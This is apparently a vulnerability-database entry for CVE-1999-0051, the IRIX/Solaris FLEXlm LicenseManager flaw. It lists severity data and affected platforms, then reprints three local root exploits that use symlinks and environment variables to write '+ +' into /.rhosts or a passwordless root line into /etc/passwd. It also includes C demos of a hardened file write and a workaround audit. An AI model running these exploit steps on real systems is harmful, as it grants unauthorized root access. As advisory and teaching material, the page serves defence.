CVE-1999-0051
CVSS 7.2
Published: 1997-01-06 00:00:00
Last modified: 2008-09-09 08:33:38

[Original] Arbitrary file creation and program execution using FLEXlm LicenseManager, from versions 4.0 to 5.0, in IRIX.


[CNNVD] IRIX FLEXlm LicenseManager File Creation and Program Execution Vulnerability (CNNVD-199701-043)

        Using FLEXlm LicenseManager versions 4.0 through 5.0 on IRIX, a local user can create arbitrary files and execute programs.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can cause a complete system outage]
Access complexity: LOW [no special access conditions are required]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/o:sgi:irix:4.0.1  (SGI IRIX 4.0.1)
cpe:/o:sun:sunos:4.1.1  (Sun SunOS 4.1.1)
cpe:/o:sun:solaris:2.5::x86
cpe:/a:sgi:license_oeo:3.0
cpe:/o:sgi:irix:5.2  (SGI IRIX 5.2)
cpe:/o:sgi:irix:6.0  (SGI IRIX 6.0)
cpe:/o:sun:sunos:4.1.4  (Sun SunOS 4.1.4)
cpe:/o:sgi:irix:4.0.5a  (SGI IRIX 4.0.5A)
cpe:/o:sgi:irix:6.0.1::xfs  (SGI IRIX 6.0.1 XFS)
cpe:/o:sun:solaris:2.4
cpe:/o:sgi:irix:4.0.5_iop  (SGI IRIX 4.0.5 IOP)
cpe:/o:sun:solaris:2.4::x86
cpe:/o:sgi:irix:6.0.1  (SGI IRIX 6.0.1)
cpe:/o:sgi:irix:6.3  (SGI IRIX 6.3)
cpe:/o:sgi:irix:4.0.5f  (SGI IRIX 4.0.5F)
cpe:/a:sgi:license_oeo:3.1
cpe:/o:sgi:irix:4.0.5d  (SGI IRIX 4.0.5D)
cpe:/o:sgi:irix:3.3.2
cpe:/o:sgi:irix:4.0.4t  (SGI IRIX 4.0.4T)
cpe:/o:sgi:irix:5.0.1  (SGI IRIX 5.0.1)
cpe:/o:sgi:irix:6.2  (SGI IRIX 6.2)
cpe:/o:sgi:irix:4.0.5g  (SGI IRIX 4.0.5G)
cpe:/o:sgi:irix:4.0.4  (SGI IRIX 4.0.4)
cpe:/o:sgi:irix:4.0.1t  (SGI IRIX 4.0.1T)
cpe:/o:sgi:irix:5.1  (SGI IRIX 5.1)
cpe:/a:globetrotter:flexlm:4.1
cpe:/o:sun:sunos:4.1.4jl
cpe:/o:sgi:irix:4.0
cpe:/o:sgi:irix:6.1  (SGI IRIX 6.1)
cpe:/o:sgi:irix:4.0.2  (SGI IRIX 4.0.2)
cpe:/o:sgi:irix:5.0
cpe:/o:sun:solaris:2.5
cpe:/o:sgi:irix:4.0.5e  (SGI IRIX 4.0.5E)
cpe:/o:sgi:irix:6.4  (SGI IRIX 6.4)
cpe:/o:sgi:irix:4.0.4b  (SGI IRIX 4.0.4B)
cpe:/o:sun:sunos:4.1.2  (Sun SunOS 4.1.2)
cpe:/o:sun:solaris:2.5.1
cpe:/o:sun:sunos:4.1.3u1  (Sun SunOS 4.1.3u1)
cpe:/a:globetrotter:flexlm:5.0
cpe:/o:sgi:irix:3.3.3
cpe:/o:sgi:irix:4.0.5h  (SGI IRIX 4.0.5H)
cpe:/a:sgi:license_oeo:3.1.1
cpe:/o:sgi:irix:4.0.5  (SGI IRIX 4.0.5)
cpe:/o:sgi:irix:4.0.3  (SGI IRIX 4.0.3)
cpe:/o:sgi:irix:5.1.1  (SGI IRIX 5.1.1)
cpe:/o:sgi:irix:5.3  (SGI IRIX 5.3)
cpe:/o:sun:sunos:4.1.3  (Sun SunOS 4.1.3)
cpe:/a:globetrotter:flexlm:4.0
cpe:/o:sun:solaris:2.5.1::x86
cpe:/o:sgi:irix:4.0.5_ipr

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0051
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0051
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199701-043
(official data source) CNNVD

- Other links and resources

- Vulnerability information

IRIX FLEXlm LicenseManager File Creation and Program Execution Vulnerability
Severity: High    Type: Unknown
1997-01-06 00:00:00    2006-02-20 00:00:00
Attack vector: Local
        Using FLEXlm LicenseManager versions 4.0 through 5.0 on IRIX, a local user can create arbitrary files and execute programs.

- Advisories and patches

        

- Vulnerability information (19066)

SGI IRIX 5.3/6.2, SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability (EDBID:19066)
Platform: irix    Type: local
Date: 1996-04-05    Verified
Author: Arthur Hagen
source: http://www.securityfocus.com/bid/72/info

Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to overwrite root-owned files allowing root access.

% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &

Install...
NetLS Node-locked
Vendor Name: whatever 
Vendor ID: + + 
Product name: whatever 
License version: 1.000 
License version: 
Expiration date: 01-jan-0 

(in license version field put a space) 

Apply 

License(s) successfully installed

% cat /.rhosts 
#:# "whatever" "whatever" "1.000" "Incomplete" 
+ + 

If your system has remote root logins disabled, replace /.rhosts with
/etc/passwd and + + with toor:0:0::/:/bin/sh.

- Vulnerability information (19067)

SGI IRIX <= 6.4, SGI license_oeo 3.0/3.1/3.1.1 LicenseManager LICENSEMGR_FILE_ROOT Vulnerability (EDBID:19067)
Platform: irix    Type: local
Date: 1996-11-22    Verified
Author: Yuri Volobuev
source: http://www.securityfocus.com/bid/73/info

Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrarily manipulate root-owned files allowing root access.

% mkdir -p /tmp/var/flexlm
% setenv LICENSEMGR_FILE_ROOT /tmp
% cd /tmp/var/flexlm
% cat > license.dat
#
# FLEXlm license file
#

FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
^D
% ln -s /.rhosts license.dat.log
% LicenseManager &

Next click on Update, fill in the four fields with any information and click
on Apply. LicenseManager will report an error. Ignore it and exit.

% cat /.rhosts


Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996

#
# FLEXlm license file
#

FEATURE + + blah sgifd 1.00 01-jan-0 0 blah

% rsh localhost -l root
#

- Vulnerability information (19350)

Solaris <= 2.5.1 License Manager Vulnerability (EDBID:19350)
Platform: solaris    Type: local
Date: 1998-10-21    Verified
Author: Joel Eriksson
source: http://www.securityfocus.com/bid/461/info

The Solaris License Manager that ships with versions 2.5.1 and 2.6 is vulnerable to multiple symlink attacks. License Manager creates lockfiles owned by root and set mode 666 which it writes to regularly. It follows symlinks.


bash$ ls -l /var/tmp/lock*
-rw-rw-rw- 1 root root 0 Oct 21 18:24 /var/tmp/lockESRI
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockISE-TCADd
-rw-rw-rw- 1 root root 0 Oct 21 14:29 /var/tmp/lockalta
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockansysd
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockasterxd
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockhpeesofd
-rw-rw-rw- 1 root root 0 Oct 21 18:46 /var/tmp/locksuntechd


And:

bash$ ls -l /var/tmp/.flexlm
total 2
-rw-rw-rw- 1 root root 163 Oct 21 19:55 lmgrd.211



There are several lockfiles created by the License Manager. It is trivial to gain root access locally through exploitation of this vulnerability.

------
#!/bin/csh -f
# Change target user name before running
# Iconoclast@thepentagon.com 10/98
rm /tmp/locksuntechd
ln -s ~targetuser/.rhosts /tmp/locksuntechd
exit
------
Then wait a minute and cat + + >> ~targetuser/.rhosts
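All three exploits above (NETLS_LICENSE_FILE, LICENSEMGR_FILE_ROOT, and the Solaris lock files) abuse the same defect: a program running as root writes to a path an unprivileged user controls, and open() follows the symlink that user planted, so the write lands on /.rhosts or /etc/passwd. The following is an added example written for this page, not code from SGI, Sun or Globetrotter. unsafe_write() reproduces the vulnerable open() call, safe_write() shows one hardened form (O_EXCL plus O_NOFOLLOW, mode 0600, and an fstat/lstat identity check), and symlink_attack_demo() runs both against a planted symlink in a scratch directory. The directory name, the "rhosts" and "license.dat.log" file names and the "+ +" payload are constructed for the demonstration.

```c
/*
 * Added example for CVE-1999-0051 (not code from the page, SGI, Sun or
 * Globetrotter).  All three exploits above abuse one pattern: a privileged
 * program writes to a path the unprivileged user chose, and open() follows
 * the symlink that user planted.  unsafe_write() reproduces it, safe_write()
 * is one hardened form.  Directory, file names and payload are constructed.
 */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable: create/truncate whatever 'path' resolves to, world-writable.
 * A symlink at 'path' redirects the write to the link's target. */
static int unsafe_write(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Hardened: O_EXCL refuses anything already at 'path' (a planted symlink
 * included), O_NOFOLLOW is belt and braces, mode is 0600 not 0666, and the
 * descriptor is checked against what lstat() now sees at 'path' so a race
 * between open() and write() cannot swap in a link.  0 on success, else -1. */
static int safe_write(const char *path, const char *data)
{
    struct stat opened, on_disk;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    if (fstat(fd, &opened) != 0 || lstat(path, &on_disk) != 0 ||
        !S_ISREG(opened.st_mode) || opened.st_dev != on_disk.st_dev ||
        opened.st_ino != on_disk.st_ino) {
        close(fd);
        errno = EIO;
        return -1;
    }
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Run the attack in a scratch directory: "rhosts" stands in for /.rhosts,
 * "license.dat.log" for the file LicenseManager writes.  Returns 1 when the
 * vulnerable writer created the target through the symlink, the hardened
 * writer refused the symlink, and the hardened writer still creates a
 * fresh file with mode 0600. */
int symlink_attack_demo(void)
{
    char dir[] = "/tmp/cve-1999-0051-XXXXXX";
    char target[128], lnk[128], fresh[128];
    struct stat st;
    int result = 0;

    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(target, sizeof target, "%s/rhosts", dir);
    snprintf(lnk, sizeof lnk, "%s/license.dat.log", dir);
    snprintf(fresh, sizeof fresh, "%s/license.dat.log.new", dir);

    /* Attacker (unprivileged): plant the symlink before the program runs. */
    if (symlink(target, lnk) == 0) {
        /* Vulnerable program: follows the link and creates the target. */
        int clobbered = unsafe_write(lnk, "+ +\n") == 0 &&
                        access(target, F_OK) == 0;
        unlink(target);
        /* Hardened program: refuses; the target is never created. */
        int refused = safe_write(lnk, "+ +\n") != 0 &&
                      access(target, F_OK) != 0;
        /* Hardened program on a clean path: works, file is 0600. */
        int works = safe_write(fresh, "ok\n") == 0 &&
                    stat(fresh, &st) == 0 && (st.st_mode & 0777) == 0600;
        result = clobbered && refused && works;
    }
    unlink(target);
    unlink(fresh);
    unlink(lnk);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("vulnerable writer followed the symlink, hardened writer refused: %s\n",
           symlink_attack_demo() ? "yes" : "no");
    return 0;
}
```

The demo runs as an ordinary user, so it shows the mechanism rather than the privilege gain: in the real attack the writer is the setuid-root LicenseManager and the target is a root-owned file. Note that O_EXCL alone already makes open() fail on a symlink regardless of where it points; O_NOFOLLOW and the post-open identity check guard the cases where the program must reopen or append to a file it created earlier.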

- Vulnerability information

897
IRIX LicenseManager NETLS_LICENSE_FILE Local Privilege Escalation
Location: Local Access Required    Classification: Misconfiguration
Impact: Loss of Integrity
Exploit: Public

- Vulnerability description

IRIX contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a malicious attacker with a local system account uses LicenseManager to manipulate root-owned files to gain root privileges. This flaw may lead to a loss of integrity.

- Timeline

1997-01-07 Unknown
1998-04-13 Unknown

- Solution

Upgrade to version 6.4 or higher, as it has been reported to fix this vulnerability. Note, however, that IRIX 6.4 itself appears in the affected-platform list above and in the EDBID:19067 title, so apply the SGI patch for the installed release rather than relying on the version number alone. In addition, Silicon Graphics, Inc. has released patches for some older versions. It is also possible to correct the flaw by implementing the following workaround:

1) Become the root user on the system.

   % /bin/su -
   Password:
   #

2) Verify that a vulnerable LicenseManager(1M) program is installed. Only license_eoe 3.0, 3.1 and 3.1.1 are vulnerable.

   # versions -b license_eoe
   I = Installed, R = Removed

      Name          Date        Description
   I  license_eoe   04/30/97    License Tools 3.1.1

3) Change the permissions on the vulnerable LicenseManager(1M) program.

   # /bin/chmod 500 /usr/etc/LicenseManager

4) Verify the new permissions on the program. Note that the program size may be different depending on release.

   # ls -al /usr/etc/LicenseManager
   -r-x------    1 root     sys       489960 Aug 12  1997 LicenseManager

5) Return to previous user level.

   # exit
   $
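Step 4 of the workaround verifies the result by eye from ls output. The following is an added example, not SGI's code, that performs the same verification from the mode bits: it reports exactly which bits still deviate from what chmod 500 leaves (owner r-x, nothing for group or other, no setuid/setgid/sticky bit). The FIND_* names, audit_mode() and audit_binary() are this example's own; /usr/etc/LicenseManager is the real path on IRIX and is only the default argument here.

```c
/*
 * Added example (not SGI's code): the check behind step 4 of the workaround,
 * evaluated from mode bits instead of by reading ls output.  "Locked down"
 * means exactly what chmod 500 leaves: owner read+execute, nothing for group
 * or other, and no setuid/setgid/sticky bit.  The path is a parameter;
 * /usr/etc/LicenseManager is the real target on IRIX and only a default here.
 */
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <sys/stat.h>

/* Findings, OR-ed together; 0 means the mode is exactly 0500. */
#define FIND_SETID       1   /* setuid, setgid or sticky bit present   */
#define FIND_OTHER_EXEC  2   /* group or other may execute             */
#define FIND_OTHER_RW    4   /* group or other may read or write       */
#define FIND_OWNER       8   /* owner bits differ from r-x             */

int audit_mode(mode_t mode)
{
    int findings = 0;
    if (mode & (S_ISUID | S_ISGID | S_ISVTX))
        findings |= FIND_SETID;
    if (mode & (S_IXGRP | S_IXOTH))
        findings |= FIND_OTHER_EXEC;
    if (mode & (S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH))
        findings |= FIND_OTHER_RW;
    if ((mode & S_IRWXU) != (S_IRUSR | S_IXUSR))
        findings |= FIND_OWNER;
    return findings;
}

/* audit_mode() findings for the file at path, or -1 if stat() fails
 * (an absent binary cannot be run and is not a vulnerable state). */
int audit_binary(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return audit_mode(st.st_mode);
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/usr/etc/LicenseManager";
    int f = audit_binary(path);
    if (f < 0) {
        perror(path);
        return 2;
    }
    printf("%s: %s\n", path, f == 0 ? "mode 0500, workaround applied"
                                    : "not locked down");
    if (f & FIND_SETID)      puts("  setuid/setgid/sticky bit set");
    if (f & FIND_OTHER_EXEC) puts("  executable by group or other");
    if (f & FIND_OTHER_RW)   puts("  readable or writable by group or other");
    if (f & FIND_OWNER)      puts("  owner bits are not r-x");
    return f == 0 ? 0 : 1;
}
```

Run it with the binary's path as the only argument; a non-zero exit means the workaround is not fully in place, and the lines under the verdict say why. A setuid-root binary left at 4755 trips all four findings, which is the state the chmod in step 3 is meant to remove.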

- References

- Vulnerability author
